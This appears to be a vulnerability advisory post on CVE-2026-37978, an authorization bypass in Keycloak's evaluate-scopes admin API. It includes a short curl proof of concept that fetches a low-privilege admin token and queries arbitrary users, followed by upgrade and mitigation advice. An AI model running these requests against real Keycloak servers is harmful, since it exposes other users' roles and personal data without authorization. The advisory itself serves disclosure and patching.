Listen to this Post
A vulnerability identified as CVE-2026-37978 has been discovered in Keycloak, an open-source identity and access management solution. The flaw resides within the administrative API endpoints that govern scope evaluation and user authorization assessment. It allows a low-privilege administrator, who possesses only the ‘view-clients’ role, to exploit this by invoking the ‘evaluate-scopes’ Admin API endpoints with an arbitrary user ID (userId) parameter. This manipulation leads to an authorization bypass, specifically a CWE-639: Authorization Bypass Through User-Controlled Key.
The core issue stems from inadequate input validation and authorization checks within the administrative API. When processing a request to the `evaluate-scopes` endpoint, the system fails to properly verify whether the requesting administrator has legitimate authorization to access the specified user’s scope information. Consequently, the request is processed, effectively bypassing the intended access controls. The vulnerable flow resolves the target user and proceeds to generate a token or user data without enforcing a user access check, allowing callers with client-scope evaluation access to act on users they are not authorized to inspect.
This vulnerability is particularly concerning as it operates through legitimate API pathways designed for administrative purposes, making detection more challenging. It can be exploited remotely over the network, eliminating the need for physical access or local system compromise. Attackers can leverage this flaw to enumerate user identities, map out authorization structures, and identify high-value targets, thereby undermining the principle of least privilege and role-based access control mechanisms.
DailyCVE Form
Platform: Keycloak
Version: Affected versions
Vulnerability: Information Disclosure
Severity: Moderate
Date: 2026-05-19
Prediction: 2026-05-20
What Undercode Say
Identify the Keycloak Admin API endpoint
ADMIN_URL="https://keycloak.example.com/auth/admin/realms/master"
Authenticate as a low-privilege admin with 'view-clients' role
ADMIN_TOKEN=$(curl -s -X POST "$ADMIN_URL/protocol/openid-connect/token" \
-d "client_id=admin-cli" \
-d "username=lowpriv-admin" \
-d "password=password" \
-d "grant_type=password" | jq -r '.access_token')
Exploit the evaluate-scopes endpoint with an arbitrary user ID
The 'userId' parameter is controlled by the attacker
curl -s -X GET "$ADMIN_URL/users/{arbitrary_user_id}/evaluate-scopes" \
-H "Authorization: Bearer $ADMIN_TOKEN"
Exploit
An attacker with the `view-clients` role can exploit this vulnerability by sending a GET request to the `evaluate-scopes` endpoint, replacing `{arbitrary_user_id}` with any valid user ID within the realm. The server will then disclose sensitive information for that user, including their scopes, roles, and other PII.
Protection
1. Upgrade to version 26.6.2 or higher.
- If upgrading is not immediately possible, restrict access to the `evaluate-scopes` Admin API endpoint to only highly privileged administrators.
- Implement strict input validation and authorization checks on all user-supplied parameters for administrative API endpoints.
Impact
Successful exploitation allows an unauthorized low-privilege administrator to gain visibility into any user’s identities, scopes, and authorizations across the entire realm. This can lead to compliance violations (e.g., GDPR, CCPA), exposure of sensitive organizational data, and potential privilege escalation by understanding the permissions assigned to other high-value targets.
🎯Let’s Practice Exploiting & Learn Patching For Free:
🎓 Live Courses & Certifications:
Join Undercode Academy for Verified Certifications
🚀 Request a Custom Project:
Secure, high-velocity infrastructure and disruptive technological engineering. Contact our engineering team for high-tier development and proprietary systems:
[email protected]
💎 Smart Architecture | 🛡️ Secure by Design | ⭐ Trusted by Thousands
Sources:
Reported By: nvd.nist.gov
Extra Source Hub:
Undercode
